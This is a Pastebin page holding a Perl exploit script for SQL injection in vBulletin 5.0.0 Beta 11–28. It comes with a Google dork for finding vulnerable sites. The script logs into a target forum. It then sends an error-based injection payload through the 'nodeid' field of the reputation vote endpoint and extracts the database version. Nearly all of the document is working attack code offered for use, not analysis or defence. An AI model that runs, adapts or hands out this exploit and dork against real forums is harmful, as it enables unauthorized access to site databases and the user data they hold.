Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: vBulletin 5 Beta XX SQLi 0day
- # Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
- # Date: 24/03/2013
- # Exploit Author: Orestis Kourides
- # Vendor Homepage: [url]www.vbulletin.com[/url]
- # Software Link:
- # Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
- # Tested on: Linux
- # CVE : None
- #!/usr/bin/perl
- use LWP::UserAgent;
- use HTTP::Cookies;
- use HTTP::Request::Common;
- use MIME::Base64;
- system $^O eq 'MSWin32' ? 'cls' : 'clear';
- print "
- +===================================================+
- | vBulletin 5 Beta XX SQLi 0day |
- | Author: Orestis Kourides |
- | Web Site: [url]www.cyitsec.net[/url] |
- +===================================================+
- ";
- if (@ARGV != 5) {
- print "\r\nUsage: perl vb5exp.pl [url]WWW.HOST.COM[/url] VBPATH URUSER URPASS MAGICNUM\r\n";
- exit;
- }
- $host = $ARGV[0];
- $path = $ARGV[1];
- $username = $ARGV[2];
- $password = $ARGV[3];
- $magicnum = $ARGV[4];
- $encpath = encode_base64('http://'.$host.$path);
- print "[+] Logging\n";
- print "[+] Username: ".$username."\n";
- print "[+] Password: ".$password."\n";
- print "[+] MagicNum: ".$magicnum."\n";
- print "[+] " .$host.$path."auth/login\n";
- my $browser = LWP::UserAgent->new;
- my $cookie_jar = HTTP::Cookies->new;
- my $response = $browser->post( 'http://'.$host.$path.'auth/login',
- [
- 'url' => $encpath,
- 'username' => $username,
- 'password' => $password,
- ],
- Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
- User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
- );
- $browser->cookie_jar( $cookie_jar );
- my $browser = LWP::UserAgent->new;
- $browser->cookie_jar( $cookie_jar );
- print "[+] Requesting\n";
- my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
- [
- 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
- ],
- User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
- );
- $data = $response->content;
- if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
- print "\n";
- exit 1;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement